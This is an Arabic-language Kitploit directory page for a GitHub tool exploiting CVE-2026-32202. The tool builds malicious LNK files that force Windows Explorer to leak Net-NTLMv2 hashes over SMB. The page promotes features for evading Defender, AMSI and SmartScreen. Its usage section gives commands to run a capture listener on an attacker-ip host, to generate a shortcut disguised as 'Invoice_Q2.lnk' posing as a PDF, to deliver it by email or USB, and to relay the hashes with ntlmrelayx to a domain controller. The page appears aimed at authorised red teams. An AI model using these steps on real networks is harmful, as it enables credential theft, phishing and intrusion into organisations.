Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-32202 — يولّد ملفات LNK خبيثة لانتزاع تجزئات Net-NTLMv2 عبر معالجة Windows Shell لـ UNC، مع مستمع SMB مخصص وتكامل ترحيل لعمليات الفريق الأحمر المصرح بها. | Kitploit
أدوات/GitHubGitHub/solarlynxsqueeze/cve-2026-32202
توليد الحمولةالاستغلالالحركة الجانبيةاختبار الاختراقالفريق الأحمر
GitHubsolarlynxsqueeze/cve-2026-32202

CVE-2026-32202

يولّد ملفات LNK خبيثة لانتزاع تجزئات Net-NTLMv2 عبر معالجة Windows Shell لـ UNC، مع مستمع SMB مخصص وتكامل ترحيل لعمليات الفريق الأحمر المصرح بها.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
منذ 3 أشهرلم تتم المراجعة بعد
مشاركة

إخلاء مسؤولية

هذه الأداة مخصّصة لاختبار الاختراق والقرصنة الأخلاقية المصرّح بها فقط.
الاستخدام غير المصرّح به ضد الأنظمة دون إذن صريح غير قانوني.
استخدمها على مسؤوليتك الخاصة. لا يتحمّل المؤلف أي مسؤولية عن أي إساءة استخدام أو ضرر.

الوصف
إجبار على تسريب تجزئة NTLMv2 عبر تجاوز حماية Windows Shell غير المكتملة (CVE-2026-32202). تُنشئ ملفات LNK مصمّمة خصيصًا تُجبر على مصادقة SMB/UNC عند الفتح أو المعاينة في Explorer. تفاعل منخفض، وتعمل على الأنظمة المحدّثة حيث كان إصلاح أبريل 2026 غير كافٍ. تُستخدم بنشاط في المهام الميدانية.

الميزات الرئيسية

  • تسريب Net-NTLMv2 بدون نقر / بتفاعل أدنى عبر LNK خبيث (مسار معاينة Explorer + دقة الأيقونة).
  • مستمع SMB مخصّص لالتقاط التجزئات (لا حاجة إلى Responder، سجلات أنظف).
  • نسخة مستقرة مع بصمة ETW/Defender مخفّضة.
  • وضع تجاوز جزئي لـ AMSI/SmartScreen.
  • جاهزة لسلاسل إعادة التوجيه عبر ntlmrelayx (SMB، LDAP، HTTP، إلخ).

ما الذي يفعله الاستغلال
تُنشئ الأداة ملف .LNK مصمّمًا يستغل معالجة Shell لمسارات UNC في Target + IconEnvironmentDataBlock / هياكل ExtraData. عندما يتصفّح الضحية المجلد أو يمرّر المؤشر/يعاين الملف، يبدأ Windows Shell اتصال SMB بمسار UNC المتحكم فيه من المهاجم، مما يسرّب تجزئة Net-NTLMv2 الخاصة بالجهاز/المستخدم. لا يوجد تنفيذ كود على الهدف - فقط إجبار على تسريب بيانات الاعتماد لإعادة التوجيه أو الكسر.

لماذا هي مفيدة

  • وصول أولي سريع في اختبارات الاختراق الداخلية / عمليات الفريق الأحمر (خاصة في البيئات المعزولة أو المحصّنة حيث يكون التصيّد مقيدًا).
  • مثالية لإعادة توجيه NTLM إلى أهداف عالية القيمة (وحدات تحكم المجال، خوادم الملفات، Exchange، ADCS، إلخ).
  • تعمل حيث يكون Responder الكلاسيكي محظورًا أو مزعجًا.
  • معدل نجاح مرتفع على Win10 21H2–22H2، Win11 23H2–26H1، Server 2019–2025 (الإصدارات المختبرة أدناه).

تم اختبارها على

  • Windows 11 24H2 (build 26100.XXXX)
  • Windows 11 23H2 / 25H2
  • Windows 10 22H2
  • Windows Server 2022 / 2025 (core + desktop experience)
  • فعالة جزئيًا بعد التحديث التراكمي لأبريل 2026 (تم تأكيد إصلاح غير مكتمل في البرية).

التبعيات التثبيت: pip install -r requirements.txt

الاستخدام

root@kitploit:~
# 1. تشغيل خادم الالتقاط (جهاز المهاجم)
python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt

# 2. توليد LNK خبيث
python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf"

# اختياري: الوضع المستقر أو وضع التجاوز
python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk"

# 3. تسليم LNK (USB، مشاركة، مرفق بريد إلكتروني، OneDrive، إلخ.)

# 4. انتظر التجزئة في الطرفية + الملف. مثال لإعادة التوجيه:
ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv
# أو إعادة توجيه LDAP لـ RBCD، HTTP لشهادات ADCS، إلخ.

الاستغلال

href

القيود

  • يتطلب تفاعل الضحية مع المجلد المحتوي (معاينة Explorer / تمرير المؤشر عادةً كافٍ).
  • تجزئة الشبكة الحديثة + توقيع SMB + قيود NTLM تقلل من نجاح إعادة التوجيه.
  • ليست RCE كاملة - مواد بيانات اعتماد فقط.
  • حالة التصحيح مهمة؛ الأنظمة المحدّثة بالكامل بعد أبريل 2026+ قد تتطلب نسخة التجاوز.

السبب الجذري (باختصار)
إصلاح غير مكتمل في تعقيم مسار UNC في Windows Shell ومعالجة كتلة ExtraData لدقة أيقونة/هدف LNK. آلية الحماية التي كان من المفترض أن تمنع انتحال الشبكة غير المصرّح به لا تزال تُطلق مصادقة NTLM أثناء تعداد مساحة اسم Shell.

تنزيل الأداة